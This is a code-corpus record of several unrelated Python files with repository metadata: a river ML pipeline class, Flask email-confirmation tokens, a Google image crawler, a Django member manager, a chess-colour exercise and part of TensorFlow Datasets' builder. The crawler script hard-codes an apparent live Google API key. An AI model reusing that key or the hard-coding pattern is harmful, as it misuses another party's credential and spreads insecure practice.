intercept_init=0.
intercept_lr=Constant (
learning_rate=0.01
)
clip_gradient=1e+12
initializer=Zeros ()
)
Note that you can also declare a pipeline by using the `compose.Pipeline` constructor
method, which is slightly more verbose:
>>> from river import compose
>>> model = compose.Pipeline(scaler, log_reg)
By using a `compose.TransformerUnion`, you can define complex pipelines that apply
different steps to different parts of the data. For instance, we can extract word counts
from text data, and extract polynomial features from numeric data.
>>> from river import feature_extraction as fx
>>> tfidf = fx.TFIDF('text')
>>> counts = fx.BagOfWords('text')
>>> text_part = compose.Select('text') | (tfidf + counts)
>>> num_part = compose.Select('a', 'b') | fx.PolynomialExtender()
>>> model = text_part + num_part
>>> model |= preprocessing.StandardScaler()
>>> model |= linear_model.LinearRegression()
The following shows an example of using `debug_one` to visualize how the information
flows and changes throughout the pipeline.
>>> from river import compose
>>> from river import naive_bayes
>>> dataset = [
... ('A positive comment', True),
... ('A negative comment', False),
... ('A happy comment', True),
... ('A lovely comment', True),
... ('A harsh comment', False)
... ]
>>> tfidf = fx.TFIDF() | compose.Prefixer('tfidf_')
>>> counts = fx.BagOfWords() | compose.Prefixer('count_')
>>> mnb = naive_bayes.MultinomialNB()
>>> model = (tfidf + counts) | mnb
>>> for x, y in dataset:
... model = model.learn_one(x, y)
>>> x = dataset[0][0]
>>> report = model.debug_one(dataset[0][0])
>>> print(report)
0. Input
--------
A positive comment
1. Transformer union
--------------------
1.0 TFIDF | Prefixer
--------------------
tfidf_comment: 0.47606 (float)
tfidf_positive: 0.87942 (float)
1.1 BagOfWords | Prefixer
-------------------------
count_comment: 1 (int)
count_positive: 1 (int)
count_comment: 1 (int)
count_positive: 1 (int)
tfidf_comment: 0.50854 (float)
tfidf_positive: 0.86104 (float)
2. MultinomialNB
----------------
False: 0.19313
True: 0.80687
"""
_WARM_UP = False
_STATELESS = False
def __init__(self, *steps):
self.steps = collections.OrderedDict()
for step in steps:
self |= step
def __getitem__(self, key):
"""Just for convenience."""
return self.steps[key]
def __len__(self):
"""Just for convenience."""
return len(self.steps)
def __or__(self, other):
"""Insert a step at the end of the pipeline."""
self._add_step(other, at_start=False)
return self
def __ror__(self, other):
"""Insert a step at the start of the pipeline."""
self._add_step(other, at_start=True)
return self
def __add__(self, other):
"""Merge with another Pipeline or TransformerUnion into a TransformerUnion."""
if isinstance(other, union.TransformerUnion):
return other.__add__(self)
return union.TransformerUnion(self, other)
def __mul__(self, other):
from river import compose
if isinstance(other, (base.Transformer, Pipeline)):
return compose.TransformerProduct(self, other)
return compose.Grouper(transformer=self, by=other)
def __rmul__(self, other):
return self * other
def __str__(self):
return " | ".join(map(str, self.steps.values()))
def __repr__(self):
return (
"Pipeline (\n\t"
+ "\t".join(",\n".join(map(repr, self.steps.values())).splitlines(True))
+ "\n)"
).expandtabs(2)
def _repr_html_(self):
from river.compose import viz
div = viz.pipeline_to_html(self)
return f"<div>{ET.tostring(div, encoding='unicode')}<style scoped>{viz.CSS}</style></div>"
def _get_params(self):
return {name: step._get_params() for name, step in self.steps.items()}
def _set_params(self, new_params: dict = None):
if new_params is None:
new_params = {}
return Pipeline(
*[
(name, new_params[name])
if isinstance(new_params.get(name), base.Estimator)
else (name, step._set_params(new_params.get(name, {})))
for name, step in self.steps.items()
]
)
@property
def _supervised(self):
return any(step._supervised for step in self.steps.values())
@property
def _last_step(self):
return list(self.steps.values())[-1]
@property
def _multiclass(self):
return self._last_step._multiclass
def _add_step(self, obj: typing.Any, at_start: bool):
"""Add a step to either end of the pipeline.
This method takes care of sanitizing the input. For instance, if a function is passed,
then it will be wrapped with a `compose.FuncTransformer`.
"""
name = None
if isinstance(obj, tuple):
name, obj = obj
def _coerce_to_estimator(obj: typing.Any) -> base.Estimator:
if isinstance(obj, (types.FunctionType, types.LambdaType)):
return func.FuncTransformer(obj)
if isinstance(obj, list):
return union.TransformerUnion(
*[_coerce_to_estimator(part) for part in obj]
)
return obj
estimator = _coerce_to_estimator(obj)
def infer_name(estimator: base.Estimator) -> str:
if isinstance(estimator, func.FuncTransformer):
return infer_name(estimator.func)
if isinstance(estimator, (types.FunctionType, types.LambdaType)):
return estimator.__name__
if hasattr(estimator, "__class__"):
return estimator.__class__.__name__
return str(estimator)
# Infer a name if none is given
if name is None:
name = infer_name(estimator)
# Make sure the name doesn't already exist
if name in self.steps:
counter = 1
while f"{name}{counter}" in self.steps:
counter += 1
name = f"{name}{counter}"
# Instantiate the estimator if it hasn't been done
if isinstance(estimator, type):
estimator = estimator()
# Store the step
self.steps[name] = estimator
# Move the step to the start of the pipeline if so instructed
if at_start:
self.steps.move_to_end(name, last=False)
# Single instance methods
def learn_one(self, x: dict, y=None, **params):
"""Fit to a single instance.
Parameters
----------
x
A dictionary of features.
y
A target value.
"""
steps = iter(self.steps.values())
# Loop over the first n - 1 steps, which should all be transformers
for t in itertools.islice(steps, len(self) - 1):
if self._WARM_UP:
if isinstance(t, union.TransformerUnion):
for sub_t in t.transformers.values():
if not sub_t._supervised:
sub_t.learn_one(x)
elif not t._supervised:
t.learn_one(x)
x_pre = x
x = t.transform_one(x)
# The supervised transformers have to be updated.
# Note that this is done after transforming in order to avoid target leakage.
if isinstance(t, union.TransformerUnion):
for sub_t in t.transformers.values():
if sub_t._supervised:
sub_t.learn_one(x_pre, y)
elif t._supervised:
t.learn_one(x_pre, y)
last_step = next(steps)
if last_step._supervised:
last_step.learn_one(x=x, y=y, **params)
else:
last_step.learn_one(x, **params)
return self
def _transform_one(self, x: dict):
"""This methods takes care of applying the first n - 1 steps of the pipeline, which are
supposedly transformers. It also returns the final step so that other functions can do
something with it.
"""
steps = iter(self.steps.values())
for t in itertools.islice(steps, len(self) - 1):
if not self._STATELESS:
if isinstance(t, union.TransformerUnion):
for sub_t in t.transformers.values():
if not sub_t._supervised:
sub_t.learn_one(x)
elif not t._supervised:
t.learn_one(x)
x = t.transform_one(x)
last_step = next(steps)
return x, last_step
def transform_one(self, x: dict, **params):
"""Apply each transformer in the pipeline to some features.
The final step in the pipeline will be applied if it is a transformer. If not, then it will
be ignored and the output from the penultimate step will be returned. Note that the steps
that precede the final step are assumed to all be transformers.
"""
x, last_step = self._transform_one(x)
if isinstance(last_step, base.Transformer):
if not last_step._supervised:
last_step.learn_one(x)
return last_step.transform_one(x, **params)
return x
def predict_one(self, x: dict, **params):
"""Call `transform_one` on the first steps and `predict_one` on the last step.
Parameters
----------
x
A dictionary of features.
"""
x, last_step = self._transform_one(x)
return last_step.predict_one(x, **params)
def predict_proba_one(self, x: dict, **params):
"""Call `transform_one` on the first steps and `predict_proba_one` on the last step.
Parameters
----------
x
A dictionary of features.
"""
x, last_step = self._transform_one(x)
return last_step.predict_proba_one(x, **params)
def score_one(self, x: dict, **params):
"""Call `transform_one` on the first steps and `score_one` on the last step.
Parameters
----------
x
A dictionary of features.
"""
x, last_step = self._transform_one(x)
return last_step.score_one(x, **params)
def forecast(self, horizon: int, xs: typing.List[dict] = None):
"""Return a forecast.
Only works if each estimator has a `transform_one` method and the final estimator has a
`forecast` method. This is the case of time series models from the `time_series` module.
Parameters
----------
horizon
The forecast horizon.
xs
A list of features for each step in the horizon.
"""
if xs is not None:
xs = [self._transform_one(x)[0] for x in xs]
return self._last_step.forecast(horizon=horizon, xs=xs)
def debug_one(self, x: dict, show_types=True, n_decimals=5) -> str:
"""Displays the state of a set of features as it goes through the pipeline.
Parameters
----------
x
A set of features.
show_types
Whether or not to display the type of feature along with it's value.
n_decimals
Number of decimals to display for each floating point value.
"""
tab = " " * 4
        # We'll redirect all the print statements to a buffer and return the content of the
        # buffer at the end
buffer = io.StringIO()
_print = functools.partial(print, file=buffer)
def format_value(x):
if isinstance(x, float):
return "{:,.{prec}f}".format(x, prec=n_decimals)
return x
def print_dict(x, show_types, indent=False, space_after=True):
# Some transformers accept strings as input instead of dicts
if isinstance(x, str):
_print(x)
else:
for k, v in sorted(x.items()):
type_str = f" ({type(v).__name__})" if show_types else ""
_print(
(tab if indent else "") + f"{k}: {format_value(v)}" + type_str
)
if space_after:
_print()
def print_title(title, indent=False):
_print((tab if indent else "") + title)
_print((tab if indent else "") + "-" * len(title))
# Print the initial state of the features
print_title("0. Input")
print_dict(x, show_types=show_types)
# Print the state of x at each step
steps = iter(self.steps.values())
for i, t in enumerate(itertools.islice(steps, len(self) - 1)):
if isinstance(t, union.TransformerUnion):
print_title(f"{i+1}. Transformer union")
for j, (name, sub_t) in enumerate(t.transformers.items()):
if isinstance(sub_t, Pipeline):
name = str(sub_t)
print_title(f"{i+1}.{j} {name}", indent=True)
print_dict(
sub_t.transform_one(x), show_types=show_types, indent=True
)
x = t.transform_one(x)
print_dict(x, show_types=show_types)
else:
print_title(f"{i+1}. {t}")
x = t.transform_one(x)
print_dict(x, show_types=show_types)
# Print the predicted output from the final estimator
final = next(steps)
if not utils.inspect.istransformer(final):
print_title(f"{len(self)}. {final}")
# If the last estimator has a debug_one method then call it
if hasattr(final, "debug_one"):
_print(final.debug_one(x))
# Display the prediction
_print()
if utils.inspect.isclassifier(final):
print_dict(
final.predict_proba_one(x), show_types=False, space_after=False
)
else:
_print(f"Prediction: {format_value(final.predict_one(x))}")
return buffer.getvalue().rstrip()
# Mini-batch methods
def learn_many(self, X: pd.DataFrame, y: pd.Series = None, **params):
"""Fit to a mini-batch.
Parameters
----------
X
A dataframe of features. Columns can be added and/or removed between successive calls.
y
A series of target values.
"""
steps = iter(self.steps.values())
# Loop over the first n - 1 steps, which should all be transformers
for t in itertools.islice(steps, len(self) - 1):
if self._WARM_UP:
if isinstance(t, union.TransformerUnion):
for sub_t in t.transformers.values():
if not sub_t._supervised:
sub_t.learn_many(X)
elif not t._supervised:
t.learn_many(X)
X_pre = X
X = t.transform_many(X=X)
# The supervised transformers have to be updated.
# Note that this is done after transforming in order to avoid target leakage.
if isinstance(t, union.TransformerUnion):
for sub_t in t.transformers.values():
if sub_t._supervised:
sub_t.learn_many(X=X_pre, y=y)
elif t._supervised:
t.learn_many(X=X_pre, y=y)
last_step = next(steps)
if last_step._supervised:
last_step.learn_many(X=X, y=y, **params)
else:
last_step.learn_many(X=X, **params)
return self
def _transform_many(self, X: pd.DataFrame):
"""This methods takes care of applying the first n - 1 steps of the pipeline, which are
supposedly transformers. It also returns the final step so that other functions can do
something with it.
"""
steps = iter(self.steps.values())
for t in itertools.islice(steps, len(self) - 1):
if isinstance(t, union.TransformerUnion):
for sub_t in t.transformers.values():
if not sub_t._supervised:
sub_t.learn_many(X=X)
elif not t._supervised:
t.learn_many(X=X)
X = t.transform_many(X=X)
last_step = next(steps)
return X, last_step
def transform_many(self, X: pd.DataFrame):
"""Apply each transformer in the pipeline to some features.
The final step in the pipeline will be applied if it is a transformer. If not, then it will
be ignored and the output from the penultimate step will be returned. Note that the steps
that precede the final step are assumed to all be transformers.
"""
X, last_step = self._transform_many(X=X)
if isinstance(last_step, base.Transformer):
if not last_step._supervised:
last_step.learn_many(X)
return last_step.transform_many(X)
return X
def predict_many(self, X: pd.DataFrame):
X, last_step = self._transform_many(X=X)
return last_step.predict_many(X=X)
def predict_proba_many(self, X: pd.DataFrame):
X, last_step = self._transform_many(X=X)
return last_step.predict_proba_many(X=X)
| 31.992415
| 99
| 0.59725
|
adc600dab3143008d40e69c791945859c7412622
| 746
|
py
|
Python
|
app/main/util/email_verification.py
|
mukul-mehta/Syphus
|
572d47b6b8dcdd13bd3a956b2a116a8fa3641087
|
[
"MIT"
] | 4
|
2019-08-15T02:12:52.000Z
|
2020-01-05T17:48:46.000Z
|
app/main/util/email_verification.py
|
mukul-mehta/Syphus
|
572d47b6b8dcdd13bd3a956b2a116a8fa3641087
|
[
"MIT"
] | 74
|
2019-08-14T20:34:33.000Z
|
2020-04-29T20:29:38.000Z
|
app/main/util/email_verification.py
|
NiHighlism/Minerva
|
4d95b215f0e5f1b1f768267c0a2dfea014e4baa1
|
[
"MIT"
] | 10
|
2019-08-14T19:35:14.000Z
|
2020-01-25T19:04:57.000Z
|
from flask import current_app
from itsdangerous import URLSafeTimedSerializer
def generate_confirmation_token(email):
serializer = URLSafeTimedSerializer(current_app.config['SECRET_KEY'])
return serializer.dumps(
email, salt=current_app.config['SECURITY_PASSWORD_SALT'])
# expiration is in seconds
# TODO: Change the expiration to 24 hours when resend email is implemented
def confirm_token(token, expiration=180000000):
serializer = URLSafeTimedSerializer(current_app.config['SECRET_KEY'])
try:
email = serializer.loads(
token,
salt=current_app.config['SECURITY_PASSWORD_SALT'],
max_age=expiration
)
except BaseException:
return False
return email
| 29.84
| 74
| 0.726542
|
c5efa56a68f97298e28f942258ebf5848f06254e
| 1,248
|
py
|
Python
|
crawl_image.py
|
ksvbka/face-mask-detector
|
c7ec54e2935a9988424b1645c46016a563b47b70
|
[
"MIT"
] | 23
|
2020-12-17T11:45:53.000Z
|
2022-03-19T06:59:11.000Z
|
crawl_image.py
|
3112ik09/face-mask-detector
|
dc33f64ddbdc6ec7d56b7f7a4fe98bbbf186354f
|
[
"MIT"
] | 1
|
2021-05-07T13:05:03.000Z
|
2021-05-17T00:59:56.000Z
|
crawl_image.py
|
3112ik09/face-mask-detector
|
dc33f64ddbdc6ec7d56b7f7a4fe98bbbf186354f
|
[
"MIT"
] | 7
|
2021-01-07T14:46:13.000Z
|
2022-01-07T09:31:22.000Z
|
import argparse
from tqdm import tqdm
from google_images_search import GoogleImagesSearch
GCS_CX = '495179597de2e4ab6'
GCS_DEVELOPER_KEY = 'AIzaSyD4dFGSan50nEmXh2Jnm4l6JHCAgEATWJc'
def crawl_image(query_text, save_dir, num=10, fileType='jpg|png', imgSize='MEDIUM'):
gis = GoogleImagesSearch(GCS_DEVELOPER_KEY, GCS_CX)
# define search params:
_search_params = {
'q': query_text,
'num': num,
'fileType': fileType,
'imgSize': imgSize
}
gis.search(search_params=_search_params)
for image in tqdm(gis.results()):
image.download(save_dir)
# image.resize(500, 500)
if __name__ == "__main__":
ap = argparse.ArgumentParser()
ap.add_argument("-q", "--query", type=str, help="String to query image")
ap.add_argument("-d", "--out-dir", type=str, help="Path to download image")
ap.add_argument("-n", "--number", type=int, choices=range(0, 10000), help="Number of result")
ap.add_argument("-f", "--file-type", type=str, help="File type of result")
ap.add_argument("-s", "--image-size", type=str, help="Image size of result")
args = ap.parse_args()
crawl_image(args.query, args.out_dir, num=args.number, fileType=args.file_type, imgSize=args.image_size)
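# --- Hedged usage note (editor addition). ---
# Example invocation; the query, directory and counts are illustrative only,
# and in practice the credentials above would be read from the environment
# (e.g. os.environ) rather than hard-coded.
#
#   python crawl_image.py -q "people wearing face masks" -d ./images -n 50 -f jpg -s MEDIUM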
| 37.818182
| 108
| 0.684295
|
688a4105a307981e68c2a3db137e5bbbaf84f99f
| 444
|
py
|
Python
|
app/teams/managers.py
|
kmnkit/web-todo
|
e06e42f5b68b2b9473fad820857634a9c5c0dadf
|
[
"MIT"
] | null | null | null |
app/teams/managers.py
|
kmnkit/web-todo
|
e06e42f5b68b2b9473fad820857634a9c5c0dadf
|
[
"MIT"
] | null | null | null |
app/teams/managers.py
|
kmnkit/web-todo
|
e06e42f5b68b2b9473fad820857634a9c5c0dadf
|
[
"MIT"
] | null | null | null |
from django.db.models import Q, Manager
class CustomMemberManager(Manager):
"""Additional Manager function"""
def add_member(self, user, team):
self.create(user=user, team=team)
def remove_member(self, user, team):
        # `Manager` does not expose `delete(**kwargs)`; filter to a QuerySet first.
        self.filter(user=user, team=team).delete()
def set_nickname(self, user, team, nickname):
member = self.get(Q(user=user) & Q(team=team))
member.nickname = nickname
member.save()
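# --- Hedged usage sketch (editor addition). ---
# Shows how the manager might be attached to a model; the Member model and its
# field names below are assumptions, not the project's actual schema.
#
# class Member(models.Model):
#     user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
#     team = models.ForeignKey("teams.Team", on_delete=models.CASCADE)
#     nickname = models.CharField(max_length=50, blank=True)
#
#     objects = CustomMemberManager()
#
# Member.objects.add_member(user=request.user, team=team)
# Member.objects.set_nickname(user=request.user, team=team, nickname="Kim")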
| 26.117647
| 54
| 0.655405
|
1210422231e52709cdecd6dacce22f5f2ff97494
| 1,410
|
py
|
Python
|
[1] BEGINNER/2787 - Xadrez.py
|
tiago040/URI-SOLUTIONS
|
519d3950252a6002e8926416b2f8217ba08fe721
|
[
"MIT"
] | 1
|
2022-03-15T03:03:26.000Z
|
2022-03-15T03:03:26.000Z
|
[1] BEGINNER/2787 - Xadrez.py
|
tiago040/URI-SOLUTIONS
|
519d3950252a6002e8926416b2f8217ba08fe721
|
[
"MIT"
] | null | null | null |
[1] BEGINNER/2787 - Xadrez.py
|
tiago040/URI-SOLUTIONS
|
519d3950252a6002e8926416b2f8217ba08fe721
|
[
"MIT"
] | null | null | null |
'''
On a chessboard, the square in row 1, column 1 (top-left corner) is always white, and the colors of the squares alternate between white and black according to the pattern known as... chess! So, since the traditional board has eight rows and eight columns, the square in row 8, column 8 (bottom-right corner) is also white. In this problem, however, we want to know the color of the bottom-right square of a board of arbitrary dimensions: L rows and C columns. In the example in the figure, for L = 6 and C = 9, the bottom-right square is black!
https://resources.urionlinejudge.com.br/gallery/images/problems/UOJ_2787.png
Input
The first line of the input contains an integer L (1 ≤ L ≤ 1000) indicating the number of rows of the board. The second line of the input contains an integer C (1 ≤ C ≤ 1000) representing the number of columns.
Output
Print one line of output. The line must contain an integer representing the color of the bottom-right square of the board: 1 if it is white; 0 if it is black.
'''
L = int(input())
C = int(input())
# Square (1, 1) is white and colors alternate, so square (L, C) is white
# exactly when L and C have the same parity, i.e. when L + C is even.
cor = 1 if (L + C) % 2 == 0 else 0
print(cor)
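# Quick check against the statement's example (editor addition): L = 6, C = 9
# gives L + C = 15, which is odd, so the program prints 0 (black), as expected.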
| 39.166667
| 577
| 0.656738
|
9b2877d408e8b38a6b5a4165ed29599657e30a52
| 49,069
|
py
|
Python
|
tensorflow_datasets/core/dataset_builder.py
|
Jaidon-Smith/datasets
|
a2cc0bdb91243a123dafd03478be51e2b0436a98
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_datasets/core/dataset_builder.py
|
Jaidon-Smith/datasets
|
a2cc0bdb91243a123dafd03478be51e2b0436a98
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_datasets/core/dataset_builder.py
|
Jaidon-Smith/datasets
|
a2cc0bdb91243a123dafd03478be51e2b0436a98
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2021 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""DatasetBuilder base class."""
import abc
import functools
import inspect
import json
import os
import sys
from typing import Any, ClassVar, Dict, Iterable, List, Optional, Union
from absl import logging
import dataclasses
import six
import tensorflow.compat.v2 as tf
from tensorflow_datasets.core import constants
from tensorflow_datasets.core import dataset_info
from tensorflow_datasets.core import download
from tensorflow_datasets.core import file_adapters
from tensorflow_datasets.core import registered
from tensorflow_datasets.core import split_builder as split_builder_lib
from tensorflow_datasets.core import splits as splits_lib
from tensorflow_datasets.core import tf_compat
from tensorflow_datasets.core import tfrecords_reader
from tensorflow_datasets.core import units
from tensorflow_datasets.core import utils
from tensorflow_datasets.core.utils import gcs_utils
from tensorflow_datasets.core.utils import read_config as read_config_lib
from tensorflow_datasets.core.utils import type_utils
import termcolor
ReadOnlyPath = type_utils.ReadOnlyPath
ReadWritePath = type_utils.ReadWritePath
VersionOrStr = Union[utils.Version, str]
FORCE_REDOWNLOAD = download.GenerateMode.FORCE_REDOWNLOAD
REUSE_CACHE_IF_EXISTS = download.GenerateMode.REUSE_CACHE_IF_EXISTS
REUSE_DATASET_IF_EXISTS = download.GenerateMode.REUSE_DATASET_IF_EXISTS
GCS_HOSTED_MSG = """\
Dataset %s is hosted on GCS. It will automatically be downloaded to your
local data directory. If you'd instead prefer to read directly from our public
GCS bucket (recommended if you're running on GCP), you can instead pass
`try_gcs=True` to `tfds.load` or set `data_dir=gs://tfds-data/datasets`.
"""
@dataclasses.dataclass(eq=False)
class BuilderConfig:
"""Base class for `DatasetBuilder` data configuration.
DatasetBuilder subclasses with data configuration options should subclass
`BuilderConfig` and add their own properties.
"""
# TODO(py3.10): Should update dataclass to be:
# * Frozen (https://bugs.python.org/issue32953)
# * Kwargs-only (https://bugs.python.org/issue33129)
name: str
version: Optional[VersionOrStr] = None
release_notes: Optional[Dict[str, str]] = None
supported_versions: List[str] = dataclasses.field(default_factory=list)
description: Optional[str] = None
class DatasetBuilder(registered.RegisteredDataset):
"""Abstract base class for all datasets.
`DatasetBuilder` has 3 key methods:
* `tfds.DatasetBuilder.info`: documents the dataset, including feature
names, types, and shapes, version, splits, citation, etc.
* `tfds.DatasetBuilder.download_and_prepare`: downloads the source data
and writes it to disk.
* `tfds.DatasetBuilder.as_dataset`: builds an input pipeline using
`tf.data.Dataset`s.
**Configuration**: Some `DatasetBuilder`s expose multiple variants of the
dataset by defining a `tfds.core.BuilderConfig` subclass and accepting a
config object (or name) on construction. Configurable datasets expose a
pre-defined set of configurations in `tfds.DatasetBuilder.builder_configs`.
Typical `DatasetBuilder` usage:
```python
mnist_builder = tfds.builder("mnist")
mnist_info = mnist_builder.info
mnist_builder.download_and_prepare()
datasets = mnist_builder.as_dataset()
train_dataset, test_dataset = datasets["train"], datasets["test"]
assert isinstance(train_dataset, tf.data.Dataset)
# And then the rest of your input pipeline
train_dataset = train_dataset.repeat().shuffle(1024).batch(128)
train_dataset = train_dataset.prefetch(2)
features = tf.compat.v1.data.make_one_shot_iterator(train_dataset).get_next()
image, label = features['image'], features['label']
```
"""
# Semantic version of the dataset (ex: tfds.core.Version('1.2.0'))
VERSION = None
# Release notes
# Metadata only used for documentation. Should be a dict[version,description]
  # Multi-line strings are automatically dedented
RELEASE_NOTES: ClassVar[Dict[str, str]] = {}
# List dataset versions which can be loaded using current code.
# Data can only be prepared with canonical VERSION or above.
SUPPORTED_VERSIONS = []
# Named configurations that modify the data generated by download_and_prepare.
BUILDER_CONFIGS = []
# Must be set for datasets that use 'manual_dir' functionality - the ones
# that require users to do additional steps to download the data
# (this is usually due to some external regulations / rules).
#
# This field should contain a string with user instructions, including
# the list of files that should be present. It will be
# displayed in the dataset documentation.
MANUAL_DOWNLOAD_INSTRUCTIONS = None
def __init__(
self,
*,
data_dir: Optional[utils.PathLike] = None,
config: Union[None, str, BuilderConfig] = None,
version: Union[None, str, utils.Version] = None,
):
"""Constructs a DatasetBuilder.
Callers must pass arguments as keyword arguments.
Args:
data_dir: directory to read/write data. Defaults to the value of
the environment variable TFDS_DATA_DIR, if set, otherwise falls back to
"~/tensorflow_datasets".
config: `tfds.core.BuilderConfig` or `str` name, optional configuration
for the dataset that affects the data generated on disk. Different
`builder_config`s will have their own subdirectories and versions.
version: Optional version at which to load the dataset. An error is
raised if specified version cannot be satisfied. Eg: '1.2.3', '1.2.*'.
The special value "experimental_latest" will use the highest version,
even if not default. This is not recommended unless you know what you
are doing, as the version could be broken.
"""
if data_dir:
data_dir = os.fspath(data_dir) # Pathlib -> str
# For pickling:
self._original_state = dict(data_dir=data_dir, config=config,
version=version)
# To do the work:
self._builder_config = self._create_builder_config(config)
# Extract code version (VERSION or config)
self._version = self._pick_version(version)
# Compute the base directory (for download) and dataset/version directory.
self._data_dir_root, self._data_dir = self._build_data_dir(data_dir)
if tf.io.gfile.exists(self._data_dir):
self.info.read_from_directory(self._data_dir)
else: # Use the code version (do not restore data)
self.info.initialize_from_bucket()
@utils.classproperty
@classmethod
@utils.memoize()
def code_path(cls) -> ReadOnlyPath:
"""Returns the path to the file where the Dataset class is located.
    Note: As the code can be run inside a zip file, the returned value is
    a `ReadOnlyPath` by default. Use `tfds.core.utils.to_write_path()` to cast
    the path into a `ReadWritePath`.
Returns:
path: pathlib.Path like abstraction
"""
modules = cls.__module__.split(".")
if len(modules) >= 2: # Filter `__main__`, `python my_dataset.py`,...
# If the dataset can be loaded from a module, use this to support zipapp.
# Note: `utils.resource_path` will return either `zipfile.Path` (for
# zipapp) or `pathlib.Path`.
try:
path = utils.resource_path(modules[0])
except TypeError: # Module is not a package
pass
else:
# For dynamically added modules, `importlib.resources` returns
# `pathlib.Path('.')` rather than the real path, so filter those by
# checking for `parts`.
# Check for `zipfile.Path` (`ResourcePath`) as it does not have `.parts`
if isinstance(path, utils.ResourcePath) or path.parts:
modules[-1] += ".py"
return path.joinpath(*modules[1:])
# Otherwise, fallback to `pathlib.Path`. For non-zipapp, it should be
# equivalent to the above return.
return utils.as_path(inspect.getfile(cls))
def __getstate__(self):
return self._original_state
def __setstate__(self, state):
self.__init__(**state)
@utils.memoized_property
def canonical_version(self) -> utils.Version:
if self._builder_config and self._builder_config.version:
return utils.Version(self._builder_config.version)
elif self.VERSION:
return utils.Version(self.VERSION)
else:
raise ValueError(
f"DatasetBuilder {self.name} does not have a defined version. "
"Please add a `VERSION = tfds.core.Version('x.y.z')` to the class."
)
@utils.memoized_property
def supported_versions(self):
if self._builder_config and self._builder_config.supported_versions:
return self._builder_config.supported_versions
else:
return self.SUPPORTED_VERSIONS
@utils.memoized_property
def versions(self) -> List[utils.Version]:
"""Versions (canonical + availables), in preference order."""
return [
utils.Version(v) if isinstance(v, six.string_types) else v
for v in [self.canonical_version] + self.supported_versions
]
def _pick_version(self, requested_version):
"""Returns utils.Version instance, or raise AssertionError."""
# Validate that `canonical_version` is correctly defined
assert self.canonical_version
if requested_version == "experimental_latest":
return max(self.versions)
for version in self.versions:
if requested_version is None or version.match(requested_version):
return version
available_versions = [str(v) for v in self.versions]
msg = "Dataset {} cannot be loaded at version {}, only: {}.".format(
self.name, requested_version, ", ".join(available_versions))
raise AssertionError(msg)
@property
def version(self):
return self._version
@property
def release_notes(self) -> Dict[str, str]:
if self.builder_config and self.builder_config.release_notes:
return self.builder_config.release_notes
else:
return self.RELEASE_NOTES
@property
def data_dir(self):
return self._data_dir
@property
def data_path(self) -> type_utils.ReadWritePath:
# Instead, should make `_data_dir` be Path everywhere
return utils.as_path(self._data_dir)
@utils.classproperty
@classmethod
def _checksums_path(cls) -> ReadOnlyPath:
"""Returns the checksums path."""
# Used:
# * To load the checksums (in url_infos)
# * To save the checksums (in DownloadManager)
new_path = cls.code_path.parent / "checksums.tsv"
# Checksums of legacy datasets are located in a separate dir.
legacy_path = utils.tfds_path() / "url_checksums" / f"{cls.name}.txt"
if (
# zipfile.Path does not have `.parts`. Additionally, `os.fspath`
# will extract the file, so use `str`.
"tensorflow_datasets" in str(new_path)
and legacy_path.exists()
and not new_path.exists()
):
return legacy_path
else:
return new_path
@utils.classproperty
@classmethod
@functools.lru_cache(maxsize=None)
def url_infos(cls) -> Optional[Dict[str, download.checksums.UrlInfo]]:
"""Load `UrlInfo` from the given path."""
# Note: If the dataset is downloaded with `record_checksums=True`, urls
# might be updated but `url_infos` won't as it is memoized.
# Search for the url_info file.
checksums_path = cls._checksums_path
# If url_info file is found, load the urls
if checksums_path.exists():
return download.checksums.load_url_infos(checksums_path)
else:
return None
@utils.memoized_property
def info(self) -> dataset_info.DatasetInfo:
"""`tfds.core.DatasetInfo` for this builder."""
# Ensure .info hasn't been called before versioning is set-up
# Otherwise, backward compatibility cannot be guaranteed as some code will
# depend on the code version instead of the restored data version
if not getattr(self, "_version", None):
# Message for developers creating new dataset. Will trigger if they are
# using .info in the constructor before calling super().__init__
raise AssertionError(
"Info should not been called before version has been defined. "
"Otherwise, the created .info may not match the info version from "
"the restored dataset.")
info = self._info()
if not isinstance(info, dataset_info.DatasetInfo):
raise TypeError(
"DatasetBuilder._info should returns `tfds.core.DatasetInfo`, not "
f" {type(info)}."
)
return info
def download_and_prepare(self, *, download_dir=None, download_config=None):
"""Downloads and prepares dataset for reading.
Args:
download_dir: `str`, directory where downloaded files are stored.
Defaults to "~/tensorflow-datasets/downloads".
download_config: `tfds.download.DownloadConfig`, further configuration for
downloading and preparing dataset.
Raises:
IOError: if there is not enough disk space available.
"""
download_config = download_config or download.DownloadConfig()
data_exists = tf.io.gfile.exists(self._data_dir)
if data_exists and download_config.download_mode == REUSE_DATASET_IF_EXISTS:
logging.info("Reusing dataset %s (%s)", self.name, self._data_dir)
return
if self.version.tfds_version_to_prepare:
available_to_prepare = ", ".join(str(v) for v in self.versions
if not v.tfds_version_to_prepare)
raise AssertionError(
"The version of the dataset you are trying to use ({}:{}) can only "
"be generated using TFDS code synced @ {} or earlier. Either sync to "
"that version of TFDS to first prepare the data or use another "
"version of the dataset (available for `download_and_prepare`: "
"{}).".format(
self.name, self.version, self.version.tfds_version_to_prepare,
available_to_prepare))
# Only `cls.VERSION` or `experimental_latest` versions can be generated.
# Otherwise, users may accidentally generate an old version using the
# code from newer versions.
installable_versions = {
str(v) for v in (self.canonical_version, max(self.versions))
}
if str(self.version) not in installable_versions:
msg = (
"The version of the dataset you are trying to use ({}) is too "
"old for this version of TFDS so cannot be generated."
).format(self.info.full_name)
if self.version.tfds_version_to_prepare:
msg += (
"{} can only be generated using TFDS code synced @ {} or earlier "
"Either sync to that version of TFDS to first prepare the data or "
"use another version of the dataset. "
).format(self.version, self.version.tfds_version_to_prepare)
else:
msg += (
"Either sync to a previous version of TFDS to first prepare the "
"data or use another version of the dataset. "
)
msg += "Available for `download_and_prepare`: {}".format(
list(sorted(installable_versions)))
raise ValueError(msg)
# Currently it's not possible to overwrite the data because it would
# conflict with versioning: If the last version has already been generated,
# it will always be reloaded and data_dir will be set at construction.
if data_exists:
raise ValueError(
